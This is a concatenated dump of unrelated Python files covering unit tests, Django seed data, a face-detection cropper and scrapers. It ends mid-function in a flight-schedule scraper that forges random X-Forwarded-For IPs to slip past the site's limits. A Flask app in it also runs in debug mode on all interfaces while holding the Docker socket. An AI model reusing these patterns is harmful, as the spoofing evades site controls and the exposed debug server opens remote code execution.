takePicture()\n    \n\n\n","sub_path":"testScripts/serialTest.py","file_name":"serialTest.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"319600407","text":"import unittest\nfrom sru_pkgmgr import helper\nfrom sru_pkgmgr import settings\n\nimport os\n\nclass TestControllers(unittest.TestCase):\n    def setUp(self):\n        helper.packageSetup()\n        self.packages = helper.load_packages()\n\n    def test_package_setup(self):\n        self.assertTrue(helper.packageSetup())\n        self.assertTrue(os.path.isfile(settings.PACKAGES))\n\n    def test_load_package(self):\n        packages = helper.load_packages()\n        self.assertIsNotNone(packages)\n    \n    def test_save_packages(self):\n        packages = helper.load_packages()\n        result = helper.save_packages(packages)\n        self.assertIsNotNone(result)\n\n    def test_add_package_1(self):\n        # new package\n        package = {\n            \"name\": \"test\",\n            \"version\": \"0.1.0\",\n            \"link\": \"https://test\"\n        }\n        old_packages = helper.load_packages()\n        new_packages = helper.add_package(package)\n        self.assertNotEqual(\n            len(old_packages[\"packages\"]), \n            len(new_packages[\"packages\"])\n        )\n\n    def test_add_package_2(self):\n        # existing package\n        package = helper.load_packages()[\"packages\"][0]\n        old_packages = helper.load_packages()\n        new_packages = helper.add_package(package)\n        self.assertEqual(\n            len(old_packages[\"packages\"]), \n            len(new_packages[\"packages\"])\n        )\n    \n    def test_remove_package_1(self):\n        # existing package\n        package = helper.load_packages()[\"packages\"][0]\n        old_packages = helper.load_packages()\n        new_packages = helper.remove_package(package)\n        self.assertNotEqual(\n            len(old_packages[\"packages\"]), \n            len(new_packages[\"packages\"])\n        )\n    \n    def test_remove_package_2(self):\n        # non existing package\n        package = {\n            \"name\": \"test\",\n            \"version\": \"0.1.0\",\n            \"link\": \"https://test\"\n        }\n        old_packages = helper.load_packages()\n        new_packages = helper.remove_package(package)\n        self.assertEqual(\n            len(old_packages[\"packages\"]), \n            len(new_packages[\"packages\"])\n        )\n    \n    def test_installed_packages(self):\n        installed = helper.installed_packages()\n        self.assertIsNotNone(installed)\n\n    def tearDown(self):\n        self.assertTrue(os.path.isfile(settings.PACKAGES))\n        os.remove(settings.PACKAGES)\n        self.assertFalse(os.path.isfile(settings.PACKAGES))\n\n\nif __name__ == \"__main__\":\n    unittest.main()","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"238104212","text":"\"\"\"\n    test file for experimenting with redis\n\"\"\"\n\n# import login_database\n# import utilities\nfrom random import choice as rc\n\n\ndef create_random_phone():\n    area = rc(['206-', '360-', '425-'])\n    prefix = rc(['234-', '321-', '456-', '987-'])\n    suffix = rc(['1212', '2789', '3767', '4123', '5555'])\n    return area + prefix + suffix\n\n\ndef choose_random_zip():\n    return rc(['98101', '98112', '98127', '98155'])\n\n\ndef run_example():\n    names = ('Andrew', 'Peter', 'Susan', 'Pam', 'Steven', 'Charlotte')\n    # fields = (':telephone', ':zip')\n    # r = login_database.login_redis_cloud()\n\n    try:\n        for name in names:\n            # r.set(customer, create_random_phone())\n            # r.set(customer, choose_random_zip())\n            customer = 'customer:' + name\n            print(customer + ':telephone,', create_random_phone())\n            print(customer + ':zip,', choose_random_zip())\n\n    except Exception as e:\n        print(f'Redis error: {e}')\n\n\nif __name__ == '__main__':\n    
run_example()\n","sub_path":"students/johnpharmd/lesson08/src/test_redis.py","file_name":"test_redis.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"526914749","text":"from envio.models import Centro, Estudio, Plan, Persona, Matricula, Entrega, Departamento\n\ncentros = [ \n Centro(100, 'Facultad de Ciencias','Z'),\n Centro(101, 'Facultad de Economía y Empresa', 'Z'),\n Centro(102, 'Facultad de Derecho', 'Z'),\n Centro(109, 'Facultad de Economía y Empresa', 'Z'),\n Centro(110, 'Escuela de Ingeniería y Arquitectura', 'Z'),\n Centro(228, 'Facultad de Empresa y Gestión Pública', 'Z'),\n Centro(175, 'Escuela Universitaria Politécnica de la Almunia','A'),\n Centro(302, 'Facultad de Ciencias Sociales y Humanas', 'Z'),\n Centro(326, 'Escuela Universitaria Politécnica de Teruel', 'T'),\n]\n\nfor c in centros:\n c.save()\n\nestudios = [\n\tEstudio(134, 'Graduado en Finanzas y Contabilidad', 5),\n\tEstudio(157, 'Graduado en Estudios en Arquitectura', 5),\n\tEstudio(148, 'Graduado en Ingeniería Informática', 5),\n]\n\nfor e in estudios:\n e.save()\n\n\nplanes = [\n\tPlan(pid=449, curso='2018', estudio=Estudio.objects.get(eid=134), centro=Centro.objects.get(cid=109)),\n\tPlan(pid=470, curso='2018', estudio=Estudio.objects.get(eid=157), centro=Centro.objects.get(cid=110)),\n\tPlan(pid=439, curso='2018', estudio=Estudio.objects.get(eid=148), centro=Centro.objects.get(cid=110)),\n\tPlan(pid=443, curso='2018', estudio=Estudio.objects.get(eid=148), centro=Centro.objects.get(cid=326)),\n]\n\nfor p in planes:\n p.save()\n\n\n\ndepartamentos = [\nDepartamento(1, 'Análisis Económico'),\nDepartamento(2, 'Anatomía e Histología Humanas'),\nDepartamento(3, 'Anatomía Patológica, Medicina Legal y Forense y Toxicología'),\nDepartamento(4, 'Anatomía, Embriología y Genética Animal'),\nDepartamento(5, 'Bioquímica y Biología Molecular y Celular'),\nDepartamento(6, 'Ciencia y Tecnología de Materiales y Fluidos'),\nDepartamento(7, 'Ciencias Agrarias y del Medio Natural'),\nDepartamento(8, 'Ciencias de la Antigüedad'),\nDepartamento(9, 'Ciencias de la Documentación e Historia de la Ciencia'),\nDepartamento(10, 'Ciencias de la Educación'),\nDepartamento(11, 'Ciencias de la Tierra'),\nDepartamento(12, 'Cirugía, Ginecología y Obstetricia'),\nDepartamento(13, 'Contabilidad y Finanzas'),\nDepartamento(14, 'Derecho de la Empresa'),\nDepartamento(15, 'Derecho Penal, Filosofía del Derecho e Historia del Derecho'),\nDepartamento(16, 'Derecho Privado'),\nDepartamento(17, 'Derecho Público'),\nDepartamento(18, 'Didáctica de las Ciencias Experimentales'),\nDepartamento(19, 'Didáctica de las Lenguas y de las Ciencias Humanas y Sociales'),\nDepartamento(20, 'Dirección de Marketing e Investigación de Mercados'),\nDepartamento(21, 'Dirección y Organización de Empresas'),\nDepartamento(22, 'Estructura e Historia Económica y Economía Pública'),\nDepartamento(23, 'Expresión Musical, Plástica y Corporal'),\nDepartamento(24, 'Farmacología y Fisiología'),\nDepartamento(25, 'Filología Española'),\nDepartamento(26, 'Filología Francesa'),\nDepartamento(27, 'Filología Inglesa y Alemana'),\nDepartamento(28, 'Filosofía'),\nDepartamento(29, 'Fisiatría y Enfermería'),\nDepartamento(30, 'Fisica Aplicada'),\nDepartamento(31, 'Física de la Materia Condensada'),\nDepartamento(32, 'Física Teórica'),\nDepartamento(33, 'Geografía y Ordenación del Territorio'),\nDepartamento(34, 'Historia del Arte'),\nDepartamento(35, 'Historia Medieval, Ciencias y Técnicas 
Historiográficas y Estudios Árabes e Islámicos'),\nDepartamento(36, 'Historia Moderna y Contemporánea'),\nDepartamento(37, 'Informática e Ingeniería de Sistemas'),\nDepartamento(38, 'Ingeniería de Diseño y Fabricación'),\nDepartamento(39, 'Ingeniería Eléctrica'),\nDepartamento(40, 'Ingeniería Electrónica y Comunicaciones'),\nDepartamento(41, 'Ingeniería Mecánica'),\nDepartamento(42, 'Ingeniería Química y Tecnologías del Medio Ambiente'),\nDepartamento(43, 'Lingüística General e Hispánica'),\nDepartamento(44, 'Matemática Aplicada'),\nDepartamento(45, 'Matemáticas'),\nDepartamento(46, 'Medicina, Psiquiatría y Dermatología'),\nDepartamento(47, 'Métodos Estadísticos'),\nDepartamento(48, 'Microbiología, Medicina Preventiva y Salud Pública'),\nDepartamento(49, 'Patología Animal'),\nDepartamento(50, 'Pediatría, Radiología y Medicina Física'),\nDepartamento(51, 'Producción Animal y Ciencia de los Alimentos'),\nDepartamento(52, 'Psicología y Sociología'),\nDepartamento(53, 'Química Analítica'),\nDepartamento(54, 'Química Física'),\nDepartamento(55, 'Química Inorgánica'),\nDepartamento(56, 'Química Orgánica'),\nDepartamento(57, 'Unidad Predepartamental de Arquitectura'),\n]\n\nfor d in departamentos:\n d.save()","sub_path":"envio/sample-data-load.py","file_name":"sample-data-load.py","file_ext":"py","file_size_in_byte":4532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"433059146","text":"#!/usr/bin/env python\n# -*- coding:utf8 -*- \n#author: songbinming\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf8')\nfrom flask import Flask, render_template, abort, send_from_directory, request\nimport docker\n\napp = Flask(__name__)\nc = docker.Client(base_url=\"unix://var/run/docker.sock\")\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n@app.route(\"/jar\", methods=[\"GET\", \"POST\"])\ndef jar_deploy():\n service_list=[\"ucenter\", \"cis-service\", \"oms-service\", \"mms-service\", \"push-service\", \"mms-cron\", \"pay-service\"]\n # if request.method == 'POST':\n # service = request.form['service']\n # msg = [ str(x) for x in dubbo_deploy(service).split('\\n') if x != '']\n # return render_template(\"jar.html\", service_list = service_list, msg=msg)\n # else:\n return render_template(\"jar.html\", service_list = service_list)\n\nif __name__ == \"__main__\":\n\tapp.run(host=\"0.0.0.0\",port=80,debug=True)\n","sub_path":"run_template.py","file_name":"run_template.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"526139528","text":"from typing import List\n\nimport itertools\n\n\ndef get_answer(n: int, k: int, ll_t: List[List[int]]) -> int:\n\n l_p = list(itertools.permutations([i for i in range(1, n)]))\n\n result = 0\n for p in l_p:\n p = [0] + list(p) + [0]\n\n time = 0\n for j in range(len(p) - 1):\n t = ll_t[p[j]][p[j+1]]\n time += t\n\n if time == k:\n result += 1\n\n return result\n\n\nif __name__ == \"__main__\":\n N, K = map(int, input().split())\n\n T = []\n for _ in range(N):\n T.append(list(map(int, input().split())))\n\n print(get_answer(N, K, T))\n","sub_path":"abc183/c/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"284666833","text":"import sys\nimport os\nimport argparse\nimport torch\nimport torch.nn as nn\nimport torch.backends.cudnn as cudnn\nimport torchvision.transforms 
as transforms\nfrom torch.autograd import Variable\nimport scipy.io as sio\n\nfrom PIL import Image, ImageDraw\nfrom pyramid import build_sfd\nfrom layers import *\nimport cv2\nimport numpy as np\nimport math\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"]='0,1'\ntorch.cuda.set_device(-1)\n\n\nprint('Loading model..')\nssd_net = build_sfd('test', 640, 2)\nnet = ssd_net\nnet.load_state_dict(torch.load('./weights/Res50_pyramid.pth'))\nnet = net.cuda()\nnet.eval()\nprint('Finished loading model!')\n'''\nif torch.cuda.device_count() > 1:\n net = nn.DataParallel(net,[0,1])\n\nnet.to(device)\n'''\ndirpath = '/home/data/FACE/vid_3/'\nsavepath = '/home/data/FACE/vid-3-face/'\n\ndef detect_face(image, shrink):\n x = image\n if shrink != 1:\n x = cv2.resize(image, None, None, fx=shrink, fy=shrink, interpolation=cv2.INTER_LINEAR)\n\n ###***** shrink **********##########\n #print('shrink:{}'.format(shrink))\n\n width = x.shape[1]\n height = x.shape[0]\n x = x.astype(np.float32)\n x -= np.array([104, 117, 123],dtype=np.float32)\n\n x = torch.from_numpy(x).permute(2, 0, 1)\n x = x.unsqueeze(0)\n #x = Variable(x, volatile=True)\n x = Variable(x, volatile=True).cuda()\n\n net.priorbox = PriorBoxLayer(width,height)\n #the following part is very important,may be report memory error without them\n with torch.no_grad():\n y = net(x)\n\n detections = y.data\n\n scale = torch.Tensor([width, height, width, height])\n\n boxes=[]\n scores = []\n for i in range(detections.size(1)):\n j = 0\n while detections[0,i,j,0] >= 0.01:\n score = detections[0,i,j,0]\n pt = (detections[0, i, j, 1:]*scale).cpu().numpy()\n boxes.append([pt[0],pt[1],pt[2],pt[3]])\n scores.append(score)\n j += 1\n if j >= detections.size(2):\n break\n\n det_conf = np.array(scores)\n boxes = np.array(boxes)\n\n if boxes.shape[0] == 0:\n return np.array([[0,0,0,0,0.001]])\n\n det_xmin = boxes[:,0] / shrink\n det_ymin = boxes[:,1] / shrink\n det_xmax = boxes[:,2] / shrink\n det_ymax = boxes[:,3] / shrink\n det = np.column_stack((det_xmin, det_ymin, det_xmax, det_ymax, det_conf))\n\n keep_index = np.where(det[:, 4] >= 0)[0]\n det = det[keep_index, :]\n return det\n\n\ndef multi_scale_test(image, max_im_shrink):\n # shrink detecting and shrink only detect big face\n st = 0.5 if max_im_shrink >= 0.75 else 0.5 * max_im_shrink\n det_s = detect_face(image, st)\n if max_im_shrink > 0.75:\n det_s = np.row_stack((det_s,detect_face(image,0.75)))\n index = np.where(np.maximum(det_s[:, 2] - det_s[:, 0] + 1, det_s[:, 3] - det_s[:, 1] + 1) > 30)[0]\n det_s = det_s[index, :]\n # enlarge one times\n bt = min(2, max_im_shrink) if max_im_shrink > 1 else (st + max_im_shrink) / 2\n det_b = detect_face(image, bt)\n\n # enlarge small iamge x times for small face\n if max_im_shrink > 1.5:\n det_b = np.row_stack((det_b,detect_face(image,1.5)))\n if max_im_shrink > 2:\n bt *= 2\n while bt < max_im_shrink: # and bt <= 2:\n det_b = np.row_stack((det_b, detect_face(image, bt)))\n bt *= 2\n\n det_b = np.row_stack((det_b, detect_face(image, max_im_shrink)))\n\n # enlarge only detect small face\n if bt > 1:\n index = np.where(np.minimum(det_b[:, 2] - det_b[:, 0] + 1, det_b[:, 3] - det_b[:, 1] + 1) < 100)[0]\n det_b = det_b[index, :]\n else:\n index = np.where(np.maximum(det_b[:, 2] - det_b[:, 0] + 1, det_b[:, 3] - det_b[:, 1] + 1) > 30)[0]\n det_b = det_b[index, :]\n\n return det_s, det_b\n\ndef multi_scale_test_pyramid(image, max_shrink):\n # shrink detecting and shrink only detect big face\n det_b = detect_face(image, 0.25)\n index = np.where(\n np.maximum(det_b[:, 2] - det_b[:, 0] + 1, 
det_b[:, 3] - det_b[:, 1] + 1)\n        > 30)[0]\n    det_b = det_b[index, :]\n\n    st = [1.25, 1.75, 2.25]\n    for i in range(len(st)):\n        if (st[i] <= max_shrink):\n            det_temp = detect_face(image, st[i])\n            # enlarge only detect small face\n            if st[i] > 1:\n                index = np.where(\n                    np.minimum(det_temp[:, 2] - det_temp[:, 0] + 1,\n                               det_temp[:, 3] - det_temp[:, 1] + 1) < 100)[0]\n                det_temp = det_temp[index, :]\n            else:\n                index = np.where(\n                    np.maximum(det_temp[:, 2] - det_temp[:, 0] + 1,\n                               det_temp[:, 3] - det_temp[:, 1] + 1) > 30)[0]\n                det_temp = det_temp[index, :]\n            det_b = np.row_stack((det_b, det_temp))\n    return det_b\n\n\n\ndef flip_test(image, shrink):\n    image_f = cv2.flip(image, 1)\n    det_f = detect_face(image_f, shrink)\n\n    det_t = np.zeros(det_f.shape)\n    det_t[:, 0] = image.shape[1] - det_f[:, 2]\n    det_t[:, 1] = det_f[:, 1]\n    det_t[:, 2] = image.shape[1] - det_f[:, 0]\n    det_t[:, 3] = det_f[:, 3]\n    det_t[:, 4] = det_f[:, 4]\n    return det_t\n\n\ndef bbox_vote(det):\n    order = det[:, 4].ravel().argsort()[::-1]\n    det = det[order, :]\n    while det.shape[0] > 0:\n        # IOU\n        area = (det[:, 2] - det[:, 0] + 1) * (det[:, 3] - det[:, 1] + 1)\n        xx1 = np.maximum(det[0, 0], det[:, 0])\n        yy1 = np.maximum(det[0, 1], det[:, 1])\n        xx2 = np.minimum(det[0, 2], det[:, 2])\n        yy2 = np.minimum(det[0, 3], det[:, 3])\n        w = np.maximum(0.0, xx2 - xx1 + 1)\n        h = np.maximum(0.0, yy2 - yy1 + 1)\n        inter = w * h\n        o = inter / (area[0] + area[:] - inter)\n\n        # get needed merge det and delete these det\n        merge_index = np.where(o >= 0.3)[0]\n        det_accu = det[merge_index, :]\n        det = np.delete(det, merge_index, 0)\n\n        if merge_index.shape[0] <= 1:\n            continue\n        det_accu[:, 0:4] = det_accu[:, 0:4] * np.tile(det_accu[:, -1:], (1, 4))\n        max_score = np.max(det_accu[:, 4])\n        det_accu_sum = np.zeros((1, 5))\n        det_accu_sum[:, 0:4] = np.sum(det_accu[:, 0:4], axis=0) / np.sum(det_accu[:, -1:])\n        det_accu_sum[:, 4] = max_score\n        try:\n            dets = np.row_stack((dets, det_accu_sum))\n        except:\n            dets = det_accu_sum\n\n    dets = dets[0:750, :]\n    return dets\n\ndef resize_image(image, height, width):\n    top, bottom, left, right = (0, 0, 0, 0)\n\n    h, w, _ = image.shape\n\n    # for images whose height and width differ, find the longest edge\n    longest_edge = max(h, w) \n\n    # compute how many pixels the short edge needs to grow to match the long edge\n    if h < longest_edge:\n        dh = longest_edge - h\n        top = dh // 2\n        bottom = dh - top\n    elif w < longest_edge:\n        dw = longest_edge - w\n        left = dw // 2\n        right = dw - left\n    else:\n        pass \n\n    # RGB color (black)\n    BLACK = [0, 0, 0]\n\n    # pad the image border so height and width are equal; cv2.BORDER_CONSTANT takes the border color from value\n    constant = cv2.copyMakeBorder(image, top , bottom, left, right, cv2.BORDER_CONSTANT, value = BLACK)\n\n    # resize the image and return it\n    return cv2.resize(constant, (height, width))\n\n\ndef write_to_txt(det, image, num):\n    n=0\n    s=0\n    j=0\n    #f.write('{:s}\\n'.format(str(num)+'.jpg'))\n    #f.write('{:d}\\n'.format(det.shape[0]))\n    for i in range(det.shape[0]):\n        xmin = det[i][0]\n        ymin = det[i][1]\n        xmax = det[i][2]\n        ymax = det[i][3]\n        score = det[i][4]\n        if n < score:\n            n = score\n            s = score\n            j = i\n        #f.write('{:.1f} {:.1f} {:.1f} {:.1f} {:.3f}\\n'.\n        #        format(xmin, ymin, (xmax - xmin + 1), (ymax - ymin + 1), score))\n        # this part crops the image; the pixel indices need to be int type\n    #print('j:',j)\n    #hight=ymax-ymin\n    #width=xmax-xmin\n    #[ymin:ymin+hight,xmin:xmin+width]\n    hight=det[j][3] - det[j][1] + 1\n    width=det[j][2] - det[j][0] + 1\n    x1=det[j][0]\n    y1=det[j][1]\n    if x1 <0:\n        x1=0\n    if y1 <0:\n        y1=0\n    #[ymin:ymin+hight,xmin:xmin+width]\n    cropimg=image[int(y1):int(y1+hight),int(x1):int(x1+width)]\n    cropimg=resize_image(cropimg, 224, 224) # resize for VGG16 input\n    
#cropimg=image[:int(130.1+242.4),175:int(175.4+313.7)]\n #new_img=Image.fromarray(cropimg) #transfrom the array to image\n #new_img.show()\n cv2.imwrite(savepath + str(num.split('-')[0]) + '/' + str(num) + '.jpg',cropimg)\n\n\nif __name__ == '__main__':\n '''\n subset = 'val' # val or test\n if subset is 'val':\n wider_face = sio.loadmat('/home/guoqiushan/share/workspace/caffe-ssd-s3fd/sfd_test_code/WIDER_FACE/wider_face_val.mat') # Val set\n else:\n wider_face = sio.loadmat('/home/guoqiushan/share/workspace/caffe-ssd-s3fd/sfd_test_code/WIDER_FACE/wider_face_test.mat') # Test set\n event_list = wider_face['event_list']\n file_list = wider_face['file_list']\n del wider_face\n\n Path = '/home/tmp_data_dir/zhaoyu/wider_face/WIDER_val/images/'\n save_path = '/home/guoqiushan/share/workspace/caffe-ssd-s3fd-focal/sfd_test_code/WIDER_FACE/eval_tools_old-version/tmp_haha' + '_' + subset + '/'\n\n \n for index, event in enumerate(event_list):\n filelist = file_list[index][0]\n if not os.path.exists(save_path + str(event[0][0].encode('utf-8'))[2:-1] ):\n os.makedirs(save_path + str(event[0][0].encode('utf-8'))[2:-1] )\n for num, file in enumerate(filelist):\n \n im_name = str(file[0][0].encode('utf-8'))[2:-1] \n Image_Path = Path + str(event[0][0].encode('utf-8'))[2:-1] +'/'+im_name[:] + '.jpg'\n print(Image_Path)\n '''\n\n list = os.listdir(dirpath) #list the content and file\n n=0\n for i in range(0,len(list)):\n path = os.path.join(dirpath,list[i])\n #save_path = os.path.join(savepath,list[i])\n os.makedirs(savepath+list[i].split('.')[0], exist_ok=True)\n checkpath=savepath+list[i].split('.')[0]\n filenum=len([lists for lists in os.listdir(checkpath) if os.path.isfile(os.path.join(checkpath, lists))])\n if filenum == 32:\n continue\n # input image\n #image = cv2.imread(path,cv2.IMREAD_COLOR)\n # input video\n camera = cv2.VideoCapture(path)\n if not camera.isOpened():\n print(\"cannot open camear\")\n exit(0)\n j=0\n while True:\n try:\n ret, frame = camera.read()\n #print('ret frame:',ret,frame.shape)\n if not ret:\n break\n image = cv2.cvtColor(frame, cv2.IMREAD_COLOR)\n #image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n max_im_shrink = (0x7fffffff / 200.0 / (image.shape[0] * image.shape[1])) ** 0.5 # the max size of input image for caffe\n #print('max_im_shrink:',max_im_shrink)\n max_im_shrink = 3 if max_im_shrink > 3 else max_im_shrink\n \n shrink = max_im_shrink if max_im_shrink < 1 else 1\n\n det0 = detect_face(image, shrink) # origin test\n det1 = flip_test(image, shrink) # flip test\n [det2, det3] = multi_scale_test(image, max_im_shrink)#min(2,1400/min(image.shape[0],image.shape[1]))) #multi-scale test\n #print('image:',image.shape)\n det4 = multi_scale_test_pyramid(image, max_im_shrink)\n det = np.row_stack((det0, det1, det2, det3, det4))\n\n dets = bbox_vote(det)\n j=j+1\n #print('j:',j)\n #f = open(savepath + list[i].split('.')[0]+'-'+str(j)+ '.txt', 'w')\n #print('det:',dets)\n #write_to_txt(f,dets,image,list[i].split('.')[0]+'-'+str(j))\n write_to_txt(dets,image,list[i].split('.')[0]+'-'+str(j))\n except:\n fi = open('/home/ye/bugvid3'+ '.txt', 'w')\n fi.write('{:s}\\n'.format(str(list[i])))\n fi.close()\n break\n if j == 32:\n #n+=1\n #print('finish-------------------')\n break\n n+=1\n print('n:',n)\n #print('event:%d num:%d' % (index + 1, num + 1))\n","sub_path":"test_for_video.py","file_name":"test_for_video.py","file_ext":"py","file_size_in_byte":12249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"334895515","text":"from 
selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.firefox.firefox_binary import FirefoxBinary\r\n\r\n\r\nclass findElements():\r\n\r\n def test(self):\r\n baseUrl = \"https://courses.letskodeit.com/practice\"\r\n binary = FirefoxBinary(\"C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\")\r\n driver = webdriver.Firefox(firefox_binary=binary)\r\n driver.get(baseUrl)\r\n\r\n web_elements = driver.find_elements(By.XPATH, \"//td[@class='course-name']\")\r\n for element in web_elements:\r\n print(element.text)\r\n driver.close()\r\n\r\nobj = findElements()\r\nobj.test()\r\n","sub_path":"findingElements/findElements.py","file_name":"findElements.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"86693439","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom retrying import retry\nimport re\nimport pymongo\nimport datetime\nimport random\nfrom apscheduler.schedulers.blocking import BlockingScheduler\n\nimport config\n\n\n\nfeichangzun = 'http://www.variflight.com'\nallUrl = \"http://www.variflight.com/sitemap.html?AE71649A58c77=\"\npausetime = 30000\n\n\nclass HANDL:\n def __init__(self, flight, flightlink):\n self.flight = flight\n self.flightlink = flightlink\n\n\nclass FCZPAC:\n def get_headers(self):\n headers = {\n \"X-Forwarded-For\": '%s.%s.%s.%s' % (\n random.randint(0, 255), random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)),\n 'Host': \"www.variflight.com\",\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Language': 'en-US,en;q=0.5',\n 'Accept-Encoding': 'gzip, deflate'}\n return headers\n\n def getquerydate(self, aircarfNo):\n client = pymongo.MongoClient(host=config.mongo_config['host'], port=config.mongo_config['port'])\n db = client.swmdb\n eagleyedates = db.feichangzun\n cursor = eagleyedates.find({\"Info.fno\": aircarfNo}, {\"Info.Date\": 1}).sort(\"Info.Date\", -1).limit(1)\n for el in cursor:\n havedate = datetime.datetime.strptime(el[\"Info\"]['Date'], \"%Y-%m-%dT%H:%M:%S\").date()\n return havedate\n\n def insertintomongo(self, flightdata):\n client = pymongo.MongoClient(host=config.mongo_config['host'], port=config.mongo_config['port'])\n db = client.swmdb\n eagleyedates = db.feichangzun\n eagleyedates.insert(flightdata)\n print(datetime.datetime.now(), 'insert mongodb success')\n\n @retry(stop_max_attempt_number=5)\n def getchuanghanglist(self):\n print('getchuanghanglist')\n try:\n startHtml = requests.get(allUrl, headers=self.get_headers())\n Soup = BeautifulSoup(startHtml.text, 'lxml')\n allA = Soup.find('div', class_='f_content').find_all('a')\n flight = []\n flightlink = []\n for i in range(1, len(allA)):\n if '3U' in allA[i].get_text():\n flight.append(allA[i].get_text())\n flightlink.append(allA[i].get('href'))\n\n return HANDL(flight, flightlink)\n except Exception as e:\n print(e)\n\n def getListData(self, flightlink, flightstr):\n print('getListData')\n today = datetime.datetime.now().date()\n allflightLink = []\n for i in range(len(flightlink)):\n alreadydate = self.getquerydate(flightstr[i])\n print(\"查询结果\", alreadydate)\n if alreadydate is not None:\n looptimes = (today + datetime.timedelta(days=7) - alreadydate).days\n tmpurl = (feichangzun + flightlink[i]).split('=')[0]\n for n in range(1, looptimes+1):\n flightlist = []\n querydate = alreadydate 
+ datetime.timedelta(days=n)\n url = tmpurl + '&fdate={}'.format(querydate.strftime(\"%Y%m%d\"))\n listHtml = requests.get(url, headers=self.get_headers())\n listSoup = BeautifulSoup(listHtml.text, 'lxml')\n listUrl = listSoup.find('div', class_='fly_list')\n if listUrl is not None:\n listhref = listUrl.find('div', class_='li_box').find_all('a')\n for link in listhref:\n if '/schedule' in link.get('href'):\n flightlist.append(link.get('href'))\n print(\"find a flight\")\n allflightLink.append(flightlist)\n else:\n print(\"no data:\", n)\n continue\n else:\n tmpurl2 = (feichangzun + flightlink[i]).split('=')[0]\n for n in range(0, 7):\n flightlist = []\n querydate2 = today + datetime.timedelta(days=n)\n url2 = tmpurl2 + '&fdate={}'.format(querydate2.strftime(\"%Y%m%d\"))\n listHtml2 = requests.get(url2, headers=self.get_headers())\n listSoup2 = BeautifulSoup(listHtml2.text, 'lxml')\n listUrl2 = listSoup2.find('div', class_='fly_list')\n if listUrl2 is not None:\n listhref2 = listUrl2.find('div', class_='li_box').find_all('a')\n for link2 in listhref2:\n if '/schedule' in link2.get('href'):\n flightlist.append(link2.get('href'))\n print(\"find a flight\")\n allflightLink.append(flightlist)\n else:\n break\n return allflightLink # [[一个航班],[]]\n\n @retry(stop_max_attempt_number=5)\n def getaflightinfo(self, aflight): # 传进来一个航班的[link],获取到这个航班的信息\n flightinfolist = []\n for el in aflight:\n flightinfo = {}\n url = feichangzun + el\n # 发送请求\n listHtml = requests.get(url, headers=self.get_headers())\n listSoup = BeautifulSoup(listHtml.text, 'lxml')\n qfcity = listSoup.find('div', class_='cir_l curr').get_text().strip()\n ddcity = listSoup.find('div', class_='cir_r').get_text().strip()\n code = el.split('/')[2].split('-')\n qfcitycode = code[0]\n ddcitycode = code[1]\n fno = code[2].split('.')[0]\n city = listSoup.find_all('div', class_='fly_mian')\n qfsimple = city[0].find('h2').get('title').split(qfcity)[1]\n if 'T' in qfsimple:\n qfTerminal = 'T' + qfsimple.split('T')[1]\n else:\n qfTerminal = \"\"\n qf = qfcity + \" \" + qfsimple\n ddsimple = city[len(city)-1].find('h2').get('title').split(ddcity)[1]\n if 'T' in ddsimple:\n ddTerminal = 'T' + ddsimple.split('T')[1]\n else:\n ddTerminal = \"\"\n dd = ddcity + \" \" + ddsimple\n qftimestr = city[0].find('span', class_='date').get_text().strip()\n qfdate = re.compile('\\d{4}[-/]\\d{2}[-/]\\d{2}').findall(qftimestr)\n qftime = qfdate[0] + \"T\" + re.compile('\\d{2}[:/]\\d{2}').findall(qftimestr)[0]\n ddtimestr = city[len(city)-1].find('span', class_='date').get_text().strip()\n dddate = re.compile('\\d{4}[-/]\\d{2}[-/]\\d{2}').findall(ddtimestr)\n ddtime = dddate[0] + \"T\" + re.compile('\\d{2}[:/]\\d{2}').findall(ddtimestr)[0]\n state = listSoup.find('div', class_='reg').get_text()\n if state == '计划':\n stateid = 1\n else:\n stateid = 0\n flightinfo['qf'] = qf\n flightinfo['qf_city'] = qfcity\n flightinfo['qf_citycode'] = qfcitycode\n flightinfo['qf_simple'] = qfsimple\n flightinfo['dd'] = dd\n flightinfo['dd_simple'] = ddsimple\n flightinfo['dd_city'] = ddcity\n flightinfo['dd_citycode'] = ddcitycode\n flightinfo['qfTerminal'] = qfTerminal\n flightinfo['ddTerminal'] = ddTerminal\n flightinfo['jhqftime_full'] = qftime\n flightinfo['sjqftime_full'] = None\n flightinfo['jhddtime_full'] = ddtime\n flightinfo['sjddtime_full'] = None\n flightinfo['State'] = state\n flightinfo['stateid'] = stateid\n flightinfo['djk'] = '--'\n flightinfo['zjgt'] = '--'\n flightinfo['xlzp'] = '--'\n flightinfo['date'] = qfdate[0]\n flightinfo['fno'] = fno\n print('get a 
